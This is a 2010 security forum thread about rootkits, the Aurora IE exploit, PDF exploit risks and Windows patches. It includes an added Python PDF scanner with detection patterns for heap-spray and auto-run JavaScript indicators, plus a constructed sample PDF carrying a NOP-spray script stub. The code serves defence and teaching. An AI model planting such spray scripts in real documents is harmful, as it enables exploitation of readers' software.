Treit says it is not only malware that will make changes to the kernel to destabilize the OS, also legit software can do this. When the kernel has been hijacked via legit software, a rootkit can hijack a next level, making detecting the malcode harder. Of all infestations 7% were low-level rootkits. For 60% the Alureon family of rootkits was responsible.
64-bit Windows
According to the Microsoft analyst the numbers show that 64-bit Windows systems are better protected against rootkits than a 32-bit Windows version (the situation now). Of all rootkits the software vendor found, only 0,67% functioned on a 64-bit platform. "It might well be that even a lower number of rootkits can activate on a 64-bit computer. Signing drivers and features like Kernel Patch Protection make 64-bit Windows a rootkit hostile environment." Treit advises users that want to outsmart rootkits to change to a 64-bit Windows. At the moment these systems are less risky. "When you could choose, go for the 64-bit."
polonus
-
@ polonus
Millions and millions of Windows computers run an "unhealthy" kernel, as appeared from a Microsoft survey. The kernel is the heart of the Windows OS and changes to it could have disastrous results. The most favourite technique for a rootkit to hide on a machine is making changes to the kernel. The software vendor wanted to know how many systems were actually rootkitted. "We found that a gigantic amount of computers is running an unhealthy kernel", according to MS Malware Protection Center's Randy Treit. 1% of all tested computers, that means millions of machines for the whole of the Windows population.
That's what I indicated here with a link to the article:
http://forum.avast.com/index.php?topic=52252.msg451041#msg451041
-
Hi YoKenny,
Then we two are twice forewarned and twice forearmed. The TDSS is a nasty one, and the Virus and Worms board is overflowing with victim messages asking for help; essexboy and oldman have their hands full eliminating this persistent process hopper rootkit b*gger. Also it seems Firefox WITHOUT NoScript is another threat where this malware is concerned,
your friend pol
-
http://www.theregister.co.uk/2010/01/08/jaunaury_patch_tuesday/
Microsoft won't fix vulnerabilities in the latest versions of Internet Explorer or Windows during its regularly scheduled patch release on Tuesday, meaning users will have to wait at least another month to get updates that correct the security risks.
-
http://www.theregister.co.uk/2010/01/08/jaunaury_patch_tuesday/
Microsoft won't fix vulnerabilities in the latest versions of Internet Explorer or Windows during its regularly scheduled patch release on Tuesday, meaning users will have to wait at least another month to get updates that correct the security risks.
Anything on The Register is just there for sensationalism and media hype. Microsoft's Jerry Bryant said the company is still working on a fix for the SMB flaw and is not aware of any in-the-wild attacks that target the weakness.
-
Anything on The Register is just there for sensationalism and media hype
it's simply not true ::) ...do you prefer the Inquirer ? :D
-
Anything on The Register is just there for sensationalism and media hype
it's simply not true ::) ...do you prefer the Inquirer ? :D
It got the "Tiger by the tail" story right.... ;D ;D
-
False Facebook charge group used to spread malware
Malware pokes outraged users
http://www.theregister.co.uk/2010/01/11/facebook_charging_rumour_malfeasance/
Rogue phishing app smuggled onto Android Marketplace
Ghost in the machine
http://www.theregister.co.uk/2010/01/11/android_phishing_app/
-
Hi malware fighters,
G Data warns that PDF is an insecure file format...
PDF is a nifty but, because of all the security leaks, an insecure file format, G Data warns. Last year 74 holes were found in Adobe Reader and Acrobat, twice the number of 2008. The benefits of using PDF are clear. Through all sorts of free PDF readers it can be opened on various systems. Then it is hard to change a PDF file, something that prevents unauthorised changes of the file. Also it is a compact format, making it attractive to send as an attachment with emails.
Over the years the PDF file format got more features, adding greatly to the complexity of the software and making it a lot easier to find exploits and security holes. Through simple toolkits like Eleonore, Liberty Exploit System or Elfiesta, it is quite easy to produce infested PDF files. Such programs can be run almost without any technological insight on the side of the cyber criminals.
Attack
The majority of exploits will use an embedded JavaScript that will be executed upon opening the file. The malicious JavaScript will use the so-called heap spray method to overload memory with NOP commands (No Operation commands) and also by reloading the shellcode over and over again. The JavaScript vulnerability in the PDF file can be used to run the shellcode and execute it. The executed shellcode will then download the malicious payload, for instance botnet components.
Users that want to be protected are advised to use another, leaner PDF reader, but the AV vendor asks users to install an AV scanner and disable JavaScript at the same time, or use the Windows DEP function (Data Execution Prevention). "Well, it is a pity that a lot of legit software won't run under the mentioned settings."
Also a security warning for PDF documents, forewarned is forearmed, folks,
polonus
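A triage scanner for the indicators the G Data summary above describes (embedded JavaScript run when the document opens, and a heap spray built from runs of NOP strings), written as an added example in Python. It is not G Data's or any product's code, and the PDF documents inside it are constructed here for the example; they carry no shellcode and are not real malicious files. Before matching it inflates FlateDecode streams and undoes #xx escapes in PDF names, since both are common ways of hiding the keywords from a plain string search.

```python
import re
import zlib

# Constructed sample: a tiny PDF whose catalog /OpenAction runs embedded
# JavaScript that builds a long %u9090 (NOP) string, the spray pattern the
# post describes. No shellcode; not a real malicious file.
SPRAY_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /JavaScript /JS (var nop = unescape("%u9090%u9090"); while (nop.length < 0x10000) nop += nop;) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign sample with no actions and no script.
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

INDICATORS = {
    "/JavaScript": rb"/JavaScript\b",
    "/JS": rb"/JS\b",
    "/OpenAction": rb"/OpenAction\b",   # action run when the document opens
    "/AA": rb"/AA\b",                   # additional actions (page open, events)
    "/Launch": rb"/Launch\b",           # launches an external program
    "unescape()": rb"unescape\s*\(",
    "%u-encoded NOP run": rb"(%u9090){2,}",
    "string growth loop": rb"while\s*\([^)]*\.length\s*<",
}
AUTO = {"/OpenAction", "/AA"}
SCRIPT = {"/JavaScript", "/JS"}
SPRAY = {"unescape()", "%u-encoded NOP run", "string growth loop"}


def normalize(data):
    """Append the inflated contents of FlateDecode streams, then undo #xx
    escapes in names (so /J#61vaScript reads as /JavaScript)."""
    chunks = [data]
    for m in re.finditer(rb"/FlateDecode.*?stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # damaged or non-zlib stream: skipped, raw bytes already kept
    text = b"\n".join(chunks)
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), text)


def scan_pdf(data):
    """Return a verdict and the indicator names found in the document."""
    text = normalize(data)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text)]
    found = set(hits)
    if found & SCRIPT and found & AUTO and found & SPRAY:
        verdict = "high"      # script, automatic trigger and spray pattern together
    elif found & SCRIPT and (found & AUTO or found & SPRAY):
        verdict = "medium"
    elif found:
        verdict = "low"       # e.g. JavaScript used legitimately in a form
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}


def build_compressed_sample():
    """Constructed sample whose script object sits in a FlateDecode stream
    with a #-escaped name, to show normalize() still exposes it."""
    body = zlib.compress(b"/S /J#61vaScript /JS (app.alert(1))")
    return (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /Filter /FlateDecode /Length " + str(len(body)).encode()
            + b" >>\nstream\n" + body + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

This is a string-level heuristic, not a PDF parser: it will miss objects nested in object streams or encoded with filters other than FlateDecode, and a "low" verdict is common for legitimate forms that use JavaScript. Its value is as a quick sorting step in front of a real analysis, and as a way to see what "disable JavaScript in the reader" actually takes away from an attacker: every "high" verdict here depends on a script running automatically on open.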
-
http://www.theregister.co.uk/2010/01/08/jaunaury_patch_tuesday/
Microsoft won't fix vulnerabilities in the latest versions of Internet Explorer or Windows during its regularly scheduled patch release on Tuesday, meaning users will have to wait at least another month to get updates that correct the security risks.
Anything on The Register is just there for sensationalism and media hype. Microsoft's Jerry Bryant said the company is still working on a fix for the SMB flaw and is not aware of any in-the-wild attacks that target the weakness.
'Anything' in this sense would suggest everything put out by The Register is hype which is plainly not true.
But I get your point YoKenny. I get The Register, and it is most times sensation hard sell that is nonetheless most times accurate enough (give or take some occasional near misses). And heaps less bundled with the soft bloat / hard sell that epitomizes many of the other publications that make up my tech feeds.
Notably, each page is a clean page - you can go to the previously viewed page without having to first negotiate a pile of hidden iframes.
-
Hi YoKenny and mkis,
Hackers may use the exploit to crash Windows. “We are developing an update to solve this problem”, according to Bryant on his blog. The old workaround, shutting down ports 139 and 445 (use the WWDC tool), is the only possibility so far to keep the OS secure against this denial-of-service attack.
nCircle's main spokesman Andrew Storms commented that he had expected the SMB problem to be patched this month, if only as a PR thing.
“On the other hand it is to be understood that MS did not, because it is "only" just a DoS-attack.” The main issue SMBv2 was patched with http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
during October last; the issue that still remains unpatched is this: http://www.microsoft.com/technet/security/advisory/977544.mspx
So if not paying attention, users will mix things up... but Microsoft "is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk.", not further commenting on it, only criminalizing the disclosure of the vulnerability,
polonus
-
thanks Polonus and mkis ;)
mkis, I see the register exactly how you described it.
Polonus, good job with the additional info, confirming my post.
-
Hi YoKenny and mkis,
Hackers may use the exploit to crash Windows. “We are developing an update to solve this problem”, according to Bryant on his blog. The old workaround, shutting down ports 139 and 445 (use the WWDC tool), is the only possibility so far to keep the OS secure against this denial-of-service attack.
nCircle's main spokesman Andrew Storms commented that he had expected the SMB problem to be patched this month, if only as a PR thing.
“On the other hand it is to be understood that MS did not, because it is "only" just a DoS-attack.” The main issue SMBv2 was patched with http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
during October last; the issue that still remains unpatched is this: http://www.microsoft.com/technet/security/advisory/977544.mspx
So if not paying attention, users will mix things up... but Microsoft "is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk.", not further commenting on it, only criminalizing the disclosure of the vulnerability,
polonus
Yes I think the security issue at the moment http://secunia.com/advisories/cve_reference/CVE-2009-3103/
with the Microsoft thing as well http://www.microsoft.com/technet/security/advisory/977544.mspx and at the same time people getting infected
I've been picking up bits and pieces on the forum now and then but not really much up with the play. Makes interesting reading though. Lots to be learned amongst this lot.
-
and siszyd32.exe :o :o :o
-
You need to modify your link as all it does is take you to the search function, not display any results if that was your aim.
-
There is a safe way to browse and not worry about these security warnings.
http://forum.avast.com/index.php?topic=19387.msg441269#msg441269 (http://forum.avast.com/index.php?topic=19387.msg441269#msg441269)
While I'm on this OS, I don't think I have anything to fear even without any Anti Virus protection. :)
-
You need to modify your link as all it does is take you to the search function, not display any results if that was your aim.
okay I see what you mean, meant to be search for siszyd32.exe under virus and worms. Just back on internet. I will delete link since we all know how to get there.
-
Chrome Sets Browser Security Standard, Says Expert
http://www.pcworld.com/article/186486/chrome_sets_browser_security_standard_says_expert.html
-
Firm to Release Database & Web Server 0days
http://www.krebsonsecurity.com/2010/01/firm-to-release-database-web-server-0days/
Jan 10, 2010: Regarding responsible disclosure
http://intevydis.blogspot.com/2010/01/jan-10-2010-regarding-responsible.html
Sun Directory Server 7.0 core_get_proxyauth_dn DoS
http://intevydis.blogspot.com/2010/01/sun-directory-server-70.html
-
Chrome Sets Browser Security Standard, Says Expert
http://www.pcworld.com/article/186486/chrome_sets_browser_security_standard_says_expert.html
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom: • Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Did you catch The Simpsons 20th Anniversary Special?
http://www.associatedcontent.com/article/2576391/the_simpsons_20th_anniversary_special.html
-
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom: • Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Super technet article :D
Can you elaborate on how it relates to Chrome specifically?
-
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom: • Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Super technet article :D
Can you elaborate on how it relates to Chrome specifically?
that was my reaction too ;) Yokenny has the ability to link unrelated things very often so don't worry. The "thinking" here is because he's running a 64 bit version of Windows and IE8 he feels safe enough against rootkit not to have to use Chrome and its sandboxing abilities. Doesn't make any sense but that's Yokenny... :D
-
I think the main issue with Chrome is still the privacy issue - collecting client server data, say, with localisation strategies and other personalization, or through google diagnose, an so on.
So far anyway.
Rootkits are another matter though. deserving of greater attention, so it seems from recent developments.
-
Hi mkis,
We can do something about that with silentio -
silentio! - anonymize your Google™ Chrome Browser!
Save your own privacy with opwoco silentio!
Feel free to spread it! http://www.opwoco.com/silentio/
opwoco security solutions
Bröckers & Wesseling GbR
Wieferthook 29
48599 Gronau-Epe
Germany
polonus
-
Hi Polonus,
I'm rerouted to https://www.opwoco.de/ which shouldn't be an issue but I cannot find "silentio" there...
-
Hi Logos,
Maybe it was removed from the developer site on demand,
Here is an alternative downloadsite:
Checking: http://wakoopa.com/download/silentio/1.0.0.0
Engine version: 5.0.1.12222
Total virus-finding records: 933762
File size: 11.62 KB
File MD5: 7eaf73e43dc1d2da525869b9159a9373
http://wakoopa.com/download/silentio/1.0.0.0 - archive HTML
>http://wakoopa.com/download/silentio/1.0.0.0/Script.0 - Ok
>http://wakoopa.com/download/silentio/1.0.0.0/Script.1 - Ok
http://wakoopa.com/download/silentio/1.0.0.0 - Ok
polonus
-
@ Polonus: thanks ;)
edit: I either get a page not found or registration required...nevermind.
-
Have a look at Some Observations on Rootkits:
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
Where it says at the bottom: • Run 64-bit Windows
for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits. While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows. If you have a choice, go with 64-bit.
I won't be switching to Chrome. 8)
Super technet article :D
Can you elaborate on how it relates to Chrome specifically?
that was my reaction too ;) Yokenny has the ability to link unrelated things very often so don't worry. The "thinking" here is because he's running a 64 bit version of Windows and IE8 he feels safe enough against rootkit not to have to use Chrome and its sandboxing abilities. Doesn't make any sense but that's Yokenny... :D
I like to keep things simple.
I do not need Chrome.
Everything should be as simple as it is, but not simpler.
Any intelligent fool can make things bigger and more complex... It takes a touch of genius - and a lot of courage to move in the opposite direction.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
Albert Einstein
-
...
Everything should be as simple as it is, but not simpler.
...
The simpler the better
Occam's razor (http://en.wikipedia.org/wiki/Occam%27s_razor)
the principle that "entities must not be multiplied beyond necessity" and the conclusion thereof, that the simplest explanation or strategy tends to be the best one.
-
I find Chrome to be simple that's why I use it. And convenient also.
-
I also like Chrome as it is very simple, and I can run it from my memory stick at school etc. (Iron)
but frankly, I am spoilt by firefox, NS etc.... :)
-
I do not need Chrome.
You don't know what you're missing. ;D
-
I do not need Chrome.
You don't know what you're missing. ;D
How about Browser Defender 8)
-
Wasn't Einstein referring to the solution to quantum theory as being simple, but no simpler?
-
I do not need Chrome.
You don't know what you're missing. ;D
How about Browser Defender 8)
I didn't know that was a browser ??? ;D
-
I didn't know that was a browser
I'm pretty sure it isn't. I think he means, the Browser Defender Add-on isn't available for chrome.
-
There is no doubt about YoKenny's capabilities. I for one have learned loads from him on this forum. Nor would I question his integrity - after all, who am I to cast that stone.
I have simply found google browser to be a rewarding experience. This is particularly so in regard to teaching how to use - a couple of directions are all that is needed, and the user is happily away to learn themself the rest. So very good as far as newbs and digitally-challenged people are concerned. They love the New Tab functionality.
This does not mean google would be the best browser in all respects.
-
To mkis, YoKenny, hello 123 and all other posters in this thread.
Consider this opinion from a browser hacker par excellence about the Google Chrome browser, some facts that cannot be easily denied however hard it may be to realize that IE is a years and years old concept that was only overhauled with IE8, not changed, same old wine in a new bag... and so the use of IE6 is still endangering all the users of safer and more secure browsers online....
The new security feature that Google Chrome brings is sandboxing, and this is the prediction about sandboxing in appl. for 2010: http://threatpost.com/en_us/blogs/i-have-only-one-security-prediction-2010-010610
Here Google Chrome is the browser trendsetter; Fx has landed at separate tab launching only at version 3.7. Drive-by downloads and malicious e-mail attachments are today's main threats. This because a malcreant is an opportunist and selects the weakest spot in the defense where they can circumvent any firewall. Security is not about SYN packet monitoring; no, the attack surface is minimized by a FW, it does not do one thing about the desktop that is connected out to the Internet. That makes sandboxing that important, my dear malware fighters, because it separates suspicious data from the user's data - it gives the attacker a more difficult task to perform to succeed. Protected Mode of IE is a right step towards that, but Google Chrome performs much better here, because Google understands that the browser equals the operating system, that IE = explorer alias browser = system. And using this principle in a browser they have built from scratch is a gigantic step forward where browser security is concerned. Dai Zovi therefore means Google Chrome in these respects is the leader of the pack.. http://www.computerworld.com/s/article/9143518/Chrome_sets_browser_security_standard_says_expert The man that earned 10.000 bucks with hacking Safari means that sandboxing is the answer:
http://cansecwest.com/post/2007-04-20-14:54:00.First_Mac_Hacked_Cancel_Or_Allow
To come up with a patch for every hole found certainly is not the way to go, that is a race that cannot be won,
polonus
-
***
Misplaced warning message at the link below :
http://forum.avast.com/index.php?topic=53353.msg452460#msg452460
***
-
***
Misplaced warning notice :
http://forum.avast.com/index.php?topic=53429.msg453175#msg453175
***
-
Adobe hit by Chinese Google attack
http://www.v3.co.uk/v3/news/2256152/adobe-hit-chinese-google-attack
-
Nice one, I see Adobe are trying to side step the awkward question that it may have been a PDF exploit that led to the hacking of Google ;D
However, Adobe is remaining pretty tight-lipped over whether the hackers originally tried to gain entry into Google's systems by exploiting a PDF vulnerability.
-
Nice one, I see Adobe are trying to side step the awkward question that it may have been a PDF exploit that led to the hacking of Google ;D
However, Adobe is remaining pretty tight-lipped over whether the hackers originally tried to gain entry into Google's systems by exploiting a PDF vulnerability.
And now it's two potential intermediary culprits, MS (with IE6) and Adobe Reader :) ... we'll soon talk more about the vectors used than about the hackers behind it ;D
-
New Trojan malware cocktail targets Microsoft Outlook Web Access users
http://www.computerworld.com.au/article/332659/new_trojan_malware_cocktail_targets_microsoft_outlook_web_access_users/
-
FIX for the new IE vulnerability...
Recently a serious hole has been found in Internet Explorer that enables hackers to penetrate corporate networks.
The SANS-institute warns the code is being exploited in the wild:
http://www.dshield.org/diary.html?storyid=8002
One of the MS advisories is enabling Data Execution Prevention (DEP) for Internet Explorer. In certain versions DEP is already installed and active, in others it is not. People do not need the FIX when on IE8 on XP SP3 or Windows Vista SP1 or later versions. The list of vulnerable systems is in the MS list.
A FIX has now been published on the MS site, switching on DEP for IE so the hole cannot be exploited.
The SANS institute does not expect an out-of-band patch to be launched, but the next round to be rolled out in February. So most systems may stay vulnerable.
To overcome that time frame install the FIX. You can find it here:
http://support.microsoft.com/kb/979352
Put the installer onto the desktop and double click to install the FIX. Put the fix as a bookmark inside the browser, because when the patch arrives you can undo the patch coming February,
polonus
-
Thanks so much Polonus for the info. I've patched a few systems using this vital information. Great to see it published here on the avast! forum as well.
-
Google, Citing Attack, Threatens to Exit China
New York Times (http://www.nytimes.com/2010/01/13/world/asia/13beijing.html?hp)
BEIJING — Google said Tuesday that it would stop cooperating with Chinese Internet censorship and consider shutting down its operations in the country altogether, citing assaults from hackers on its computer systems and China’s attempts to “limit free speech on the Web.”
Pop-Up Security Warnings Pose Threats
Federal Bureau of Investigation (http://www.fbi.gov/pressrel/pressrel09/popup121109.htm)
The FBI warned consumers today about an ongoing threat involving pop-up security messages that appear while they are on the Internet. The messages may contain a virus that could harm your computer, cause costly repairs or, even worse, lead to identity theft. The messages contain scareware, fake or rogue anti-virus software that looks authentic.
-
@ .: L' arc :.:
Both are old news, the FBI warning is from December 11, 2009, and the ongoing Google vs China story is from January 12... and I started a thread on the 13th:
http://forum.avast.com/index.php?topic=53364.msg452547#msg452547
-
Hi folks,
Demonstration of the Aurora IE Exploit on video:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
domain names and files to check on for Aurora hack:
http://www.mcafee.com/us/local_content/reports/how_can_u_tell_v5.pdf
extended analysis of the Exploit: http://blog.threatexpert.com/2010/01/trojanhydraq-part-ii.html
Comment shows the effectiveness of social engineering in Exploits:
http://web2.sys-con.com/node/1248613
polonus
-
Hi malware fighters,
Hackers promise the Aurora exploit to work with IE8 and DEP: http://twitter.com/DinoDaiZovi
He also expects to get a functional exploit for XP and IE8:
The first attack outside the Aurora exploit cycle, was found here:
http://securitylabs.websense.com/content/Blogs/3530.aspx
The site was taken down. The heap spray exploit will be refined,
polonus
-
@ polonus
Any precautionary measure?
-
Hi Chris Thomas,
Not really at the moment. One could upgrade to IE8 according to the MS advice. Security experts say that the exploit can only be prevented through hardware DEP.
So we expect an out-of-band patch before Feb. 9 any moment now, emergency patch imminent:
http://blogs.technet.com/msrc/archive/2010/01/18/advisory-979352-update-for-monday-january-18.aspx
At the moment we have this MS fix to be used temporarily : http://go.microsoft.com/?linkid=9668626
Software DEP is no real DEP, only a form of '/SAFESEH', no effective means to stop this exploit, according to MS.
MS security expert Ness remarks that there is a well-known attack that can circumvent DEP via .NET classes. "IE8 does not allow loading these .NET classes in the Internet Zone. In the Intranet zone they are allowed. That is why an attacker that hosts content on a network may circumvent DEP to successfully abuse the hole."
So for the moment refrain from using IE, shun BlueE until patched as many governments now say (Germany, France, Holland), and use Firefox or the Flock browser with the NoScript and RequestPolicy add-ons installed. Then you are 100% safe,
polonus
P.S. Check if your machine supports hardware DEP: http://support.microsoft.com/kb/912923
D
-
@ polonus
As we’ve previously reported, attacks remain targeted to a very limited number of corporations and are only effective against Internet Explorer 6.
We have not seen successful attacks on Internet Explorer 8. We continue to recommend customers upgrade to Internet Explorer 8 to benefit from the improved security protection it offers.
I am a FUD fighter:
http://en.wiktionary.org/wiki/FUD
-
@ Polonus
Thanks for keeping me updated
I won't be using IE and I have made my security settings very high
-
Hi YoKenny,
Heap spray attacks are no FUD, and why would MS come up with an out-of-band emergency patch if there was nothing wrong? Why would governments like Germany, France and the Netherlands advise their citizens NOT to use IE for the moment? Just because of what you call FUD? No, it is MS that can only secure their software through hardware measures.
If someone could explain to me why Google Chrome is better security-wise than Firefox, I would drop Firefox every minute. Why can't IE users come to terms with the idea that their browser has a long, long beard? The IE concept is decades old,
polonus
-
Poisoned PDF pill used to attack US military contractors
http://www.theregister.co.uk/2010/01/18/booby_trapped_pdf_cyber_espionage/
http://www.f-secure.com/weblog/archives/00001859.html
-
D-Link issues fixes for router vulnerabilities
Taiwanese firm says flaw could allow hackers to access administrative settings
http://www.computerworld.com/s/article/9145139/D_Link_issues_fixes_for_router_vulnerabilities?taxonomyId=80
D-Link Routers: One Hack to Own Them All
http://www.sourcesec.com/2010/01/09/d-link-routers-one-hack-to-own-them-all/
-
Akamai: World Internet connection speeds on the rise; Russia, Brazil top cyberattack centers
http://blogs.zdnet.com/BTL/?p=29634
Russia, Brazil Lead Cyber Attack Barrage
http://www.esecurityplanet.com/features/article.php/3858971/From-Russia-With-Spam.htm
-
Super firewall aims to block site swampers
http://www.pcw.co.uk/personal-computer-world/news/2160399/super-firewall-aims-block-dos
Super firewall aims to stop DDOS
http://www.infoworld.com/d/security-central/super-firewall-aims-stop-ddos-401
Welcome to the DIADEM FIREWALL homepage.
http://www.diadem-firewall.org/index.php
pdf
http://www.diadem-firewall.org/documents/Diadem%20Firewall%20-%20D8%20-%20Initial%20Firewall%20Element%20Prototype.pdf
-
Microsoft readies emergency IE patch
The out-of-band update will be released once the company is satisfied that it has been properly tested against all affected versions of Windows. by Ryan Naraine
READ FULL STORY (http://ct.zdnet.com/clicks?t=521872013-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
-
Critical out-of-band IE patch coming tomorrow (Jan 21)
http://blogs.zdnet.com/security/?p=5298&tag=nl.e589
-
***
Be on the lookout for email like this example I received today. Do not open it!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MESSAGE QUARANTINED
Virus Detected: CMU-10739-20100120
Message Details:
From: "DHL Manager Cynthia Estes" <shipping(at)dhl.com>
Subject: DHL Tracking Number 0260151405.
Date: Thu, 21 Jan 2010 10:05:23 +0800
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***
-
***
Be on the lookout for email like this example I received today. Do not open it!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MESSAGE QUARANTINED
Virus Detected: CMU-10739-20100120
Message Details:
From: "DHL Manager Cynthia Estes" <shipping(at)dhl.com>
Subject: DHL Tracking Number 0260151405.
Date: Thu, 21 Jan 2010 10:05:23 +0800
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***
Gmail users are safe; Gmail itself blocks it and gives the reason for blocking it.
-
Be on the lookout for email like this example I received today. Do not open it!
<snip>
Message Details:
From: "DHL Manager Cynthia Estes" <shipping(at)dhl.com>
Subject: DHL Tracking Number 0260151405.
Date: Thu, 21 Jan 2010 10:05:23 +0800
<snip>
This type of phishing/malicious email has been doing the rounds for well over a year or longer. It just seems the company changes, UPS previously, etc.
-
Yup -- I still see variations (in my ISP's quarantine) supposedly from just about every courier/delivery service around ... UPS, FedEx, Purolator, you name it.
Even if there's no infection in the email itself (or attachments, if any), this is essentially just a new twist on the classic "problem with your account" phishing thing supposedly from the bank. Those are really funny, actually, since the vast majority of them are typically from banks you've never dealt with. The rare ones that do claim to be from my bank I'll forward to its security department since the contents seem to indicate familiarity with the bank's online systems.
-
The IE vulnerability has been fixed
Just do a Windows Update
http://news.bbc.co.uk/2/hi/technology/8469632.stm
-
Microsoft Security Advisory (979682) (http://www.microsoft.com/technet/security/advisory/979682.mspx)
Vulnerability in Windows Kernel Could Allow Elevation of Privilege
Note: This only seems to affect 32 bit architecture.
-
Hi bob3160,
About the work-around:
In a posting to a public mailing list, Tavis Ormandy disclosed a zero-day privilege escalation vulnerability in the Windows kernel. All versions of Windows, from Windows NT 3.1 up to and including Windows 7, are affected.
The vulnerability affects support for 16-bit applications. In most cases, it is safe to turn off support for 16-bit applications.
Here are the mitigation instructions (copied from the advisory):
Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack from functioning, as without a process with VdmAllowed, it is not possible to access NtVdmControl() (without SeTcbPrivilege, of course).
The policy template "Windows Components\Application Compatibility\Prevent access to 16-bit applications" may be used within the group policy editor to prevent unprivileged users from executing 16-bit applications. I'm informed this is an officially supported machine configuration.
Administrators unfamiliar with group policy may find the videos below instructive. Further information is available from the Windows Server Group Policy Home
http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.
pol
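Added here as an example (not part of polonus's post or of the advisory he quotes): a PowerShell check, run as administrator, that reports whether the "Prevent access to 16-bit applications" policy is in effect on a machine. It assumes the policy template writes the VDMDisallowed DWORD under HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat, which is my understanding of that template, not something the post states.

```powershell
# Added example: audit the 16-bit application policy mentioned in the advisory.
# Assumption: the "Prevent access to 16-bit applications" template sets
# HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat\VDMDisallowed = 1.
function Test-Vdm16BitPolicy {
    $policyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat'
    $valueName  = 'VDMDisallowed'

    # Per the note in the thread, the issue is reported for 32-bit Windows only;
    # 64-bit Windows has no NTVDM subsystem to disable. Is64BitOperatingSystem
    # needs .NET 4 / PowerShell 3 or later.
    $is64Bit = [Environment]::Is64BitOperatingSystem

    $value = $null
    if (Test-Path $policyPath) {
        $value = (Get-ItemProperty -Path $policyPath -Name $valueName -ErrorAction SilentlyContinue).$valueName
    }

    # Mitigated = either the platform is not affected or the policy is set.
    # This reflects the group policy route only, not a manual subsystem change.
    [pscustomobject]@{
        Is64BitOS        = $is64Bit
        PolicyKeyPresent = (Test-Path $policyPath)
        VDMDisallowed    = $value
        Mitigated        = ($is64Bit -or ($value -eq 1))
    }
}

Test-Vdm16BitPolicy | Format-List
```

A result of Mitigated = False on a 32-bit machine means the policy from the advisory has not been applied; the linked Group Policy documentation covers how to set it.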
-
Widespread attacks exploit newly patched IE bug
Symantec has seen attacks on hundreds of websites over the past day
http://computerworld.co.nz/news.nsf/scrt/3A4F677083954A91CC2576B300156A8D
-
Widespread attacks exploit newly patched IE bug
Symantec has seen attacks on hundreds of websites over the past day
http://computerworld.co.nz/news.nsf/scrt/3A4F677083954A91CC2576B300156A8D
can't believe it...OK, believe it or not, this afternoon I was thinking there would possibly be a new bug after this patch, resulting from the patch itself maybe ;D :D oh no :o
-
This is for real. It's unbelievable but it's happening. :o
-
UK is world's most popular phishing target
http://www.computing.co.uk/v3/news/2256635/uk-popular-phishing-target
Cardiff tops UK plastic fraud list
Er, in your face, London!
http://www.theregister.co.uk/2010/01/21/uk_plastic_fraud_hotspot/
-
Depressing Analysis Of RockYou Hacked Passwords
http://www.techcrunch.com/2010/01/21/depressing-analysis-of-rockyou-hacked-passwords/
Swedes swap passwords for chocolate treats
http://www.thelocal.se/24486/20100120/
RockYou admits security snafu exposed email login details
http://www.theregister.co.uk/2009/12/17/rockyou_security_snafu/
-
'Cyber Genome Project' kicked off by DARPA
The code you write - it'll be as traceable as your DNA
http://www.theregister.co.uk/2010/01/26/cyber_genome_project/
False positive.....not only avast:
Kaspersky update slaps Trojan warning on Google Adsense
Tsk, you and your false positives
http://www.theregister.co.uk/2010/01/25/kaspersky_adsense_false_positive/
-
***
